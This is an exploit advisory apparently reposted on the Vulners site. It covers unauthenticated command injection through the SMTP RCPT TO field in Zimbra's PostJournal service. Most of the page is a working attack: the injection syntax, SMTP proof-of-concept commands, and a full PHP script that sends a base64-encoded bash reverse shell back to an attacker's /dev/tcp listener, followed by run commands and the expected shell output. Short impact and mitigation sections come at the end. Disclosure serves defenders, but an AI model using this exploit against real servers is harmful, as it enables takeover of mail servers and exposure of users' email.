Vulners
Lucene search
📄 Zimbra Collaboration Suite Postjournal 9.0.0 Remote Command Execution
=============================================================================================================================================
| # Title : Zimbra Collaboration Suite Postjournal 9.0.0 Unauthenticated RCE |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.zimbra.com/ |
=============================================================================================================================================
POC :
1. Overview
-----------
A critical vulnerability exists in the Zimbra Collaboration Suite (ZCS) PostJournal service that allows attackers to execute arbitrary system commands without authentication.
The vulnerability is triggered through SMTP injection using a malicious RCPT TO parameter. This exploit provides full remote command execution (RCE) as the Zimbra user, enabling an attacker to gain a reverse shell.
The root cause is improper sanitization of user-controlled email fields inside the PostJournal processing mechanism.
----------------------------------------------
2. Vulnerability Details
------------------------
The PostJournal service processes incoming emails and interacts with external components. Due to a command injection flaw in the way Zimbra handles the RCPT TO address, attackers can inject shell commands using syntax such as:
RCPT TO:<aabbb$(COMMAND)@domain.com>
Zimbra interprets the `$()` expression as a shell command and executes it under the mail server context.
This leads to full RCE.
----------------------------------------------
3. Requirements
---------------
• ZCS installation (vulnerable version)
• SMTP access reachable externally
• No authentication required
• Attacker’s listener ready to receive reverse shell
----------------------------------------------
4. Proof of Concept (PoC)
-------------------------
The exploit uses standard SMTP commands:
EHLO localhost
MAIL FROM:<[email protected]>
RCPT TO:<aabbb$(payload)@test.com>
DATA
Test
.
QUIT
The payload is a Base64‑encoded reverse shell executed via:
echo BASE64 | base64 -d | bash
----------------------------------------------
5. PHP Exploit Code
-------------------------------------------
The following PHP PoC sends the exploit to Zimbra and creates a built‑in TCP listener without using `pcntl_fork()`:
<?php
set_time_limit(0);
error_reporting(E_ALL);
ob_implicit_flush(true);
class SMTPExploit {
private $target;
private $port;
private $lhost;
private $lport;
private $mail_from;
private $rcpt_to;
private $sock;
private $command;
public function __construct($target, $port, $lhost, $lport) {
$this->target = $target;
$this->port = $port;
$this->lhost = $lhost;
$this->lport = $lport;
$this->mail_from = $this->random_email();
$this->rcpt_to = $this->random_email();
$this->command = $this->generate_b64_shell();
}
private function random_email() {
return substr(md5(rand()), 0, 8)."@test.com";
}
private function generate_b64_shell() {
$cmd = "/bin/bash -i 5<> /dev/tcp/{$this->lhost}/{$this->lport} 0<&5 1>&5 2>&5";
$b64 = base64_encode($cmd);
return "echo ${b64}|base64 -d|bash";
}
private function injected_rcpt() {
return "aabbb\$({$this->command})@{$this->rcpt_to}";
}
private function connect() {
$this->sock = fsockopen($this->target, $this->port, $e, $s, 10);
if (!$this->sock) die("[!] Cannot connect to SMTP server\n");
fgets($this->sock, 4096);
}
private function send($cmd) {
fwrite($this->sock, $cmd."\r\n");
return fgets($this->sock, 4096);
}
public function run() {
echo "[*] Connecting to SMTP...\n";
$this->connect();
$this->send("EHLO localhost");
$this->send("MAIL FROM:<{$this->mail_from}>");
$inj = $this->injected_rcpt();
$this->send("RCPT TO:<{$inj}>");
$this->send("DATA");
fwrite($this->sock, "Test\r\n.\r\n");
$this->send("QUIT");
fclose($this->sock);
echo "[+] Exploit Sent.\n";
}
}
class Listener {
private $host;
private $port;
public function __construct($h, $p) {
$this->host = $h;
$this->port = $p;
}
public function start() {
echo "[*] Starting listener on {$this->host}:{$this->port}\n";
$sock = stream_socket_server("tcp://{$this->host}:{$this->port}", $e, $s);
if (!$sock) die("[!] Cannot start listener\n");
while (true) {
$client = @stream_socket_accept($sock, 1);
if ($client) {
echo "[+] Connection received\n";
$this->interactive($client);
fclose($client);
}
}
}
private function interactive($client) {
fwrite($client, "Connected!\n> ");
while (!feof($client)) {
$cmd = trim(fgets($client));
if ($cmd === "exit") break;
$out = shell_exec($cmd);
fwrite($client, $out . "\n> ");
}
}
}
$target = $argv[1] ?? "127.0.0.1";
$port = $argv[2] ?? 25;
$lhost = $argv[3] ?? "0.0.0.0";
$lport = $argv[4] ?? 4444;
echo "[*] Launching listener thread...\n";
$listener = new Listener($lhost, $lport);
$listener_running = false;
$exploit_sent = false;
while (true) {
if (!$listener_running) {
echo "[*] Listener online...\n";
$listener_running = true;
$listener->start();
}
if (!$exploit_sent) {
echo "[*] Sending exploit...\n";
$e = new SMTPExploit($target, $port, $lhost, $lport);
$e->run();
$exploit_sent = true;
}
usleep(10000);
}
?>
-------------------------
How to Run the Exploit
-------------------------
### **1. Save the script**
Save the code as:
zimbra_rce.php
### **2. Start it from terminal**
Windows example:
php zimbra_rce.php 192.168.1.50 25 192.168.1.10 4444
Linux example:
php zimbra_rce.php mail.example.com 25 attacker-ip 4444
### **Arguments format:**
| Argument | Description |
|---------|-------------|
| 1 | Target Zimbra SMTP IP |
| 2 | SMTP port (default 25) |
| 3 | Attacker listener IP |
| 4 | Listener port |
### **3. Wait for Shell**
If the server is vulnerable, you will see:
[*] Listener online...
[*] Sending exploit...
[+] Exploit Sent.
[+] Connection received
Connected!
>
Now you have a remote shell.
----------------------------------------------
6. Impact
---------
• Full remote command execution
• Full server compromise possible
• Email data exposure
• Privilege escalation (depending on system configuration)
• Lateral movement inside the network
----------------------------------------------
7. Mitigation
-------------
Until patches are applied:
• Block external SMTP access to PostJournal component
• Apply strict sanitization rules for RCPT field
• Monitor suspicious SMTP activity
• Restrict Zimbra service user privileges
----------------------------------------------
8. Conclusion
-------------
This vulnerability presents a severe risk and must be mitigated immediately.
The exploit demonstrates how a simple SMTP injection can lead to full RCE, highlighting the need for strict input validation in email‑processing systems.
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
08 Dec 2025 00:00Current
8.5High risk
Vulners AI Score8.5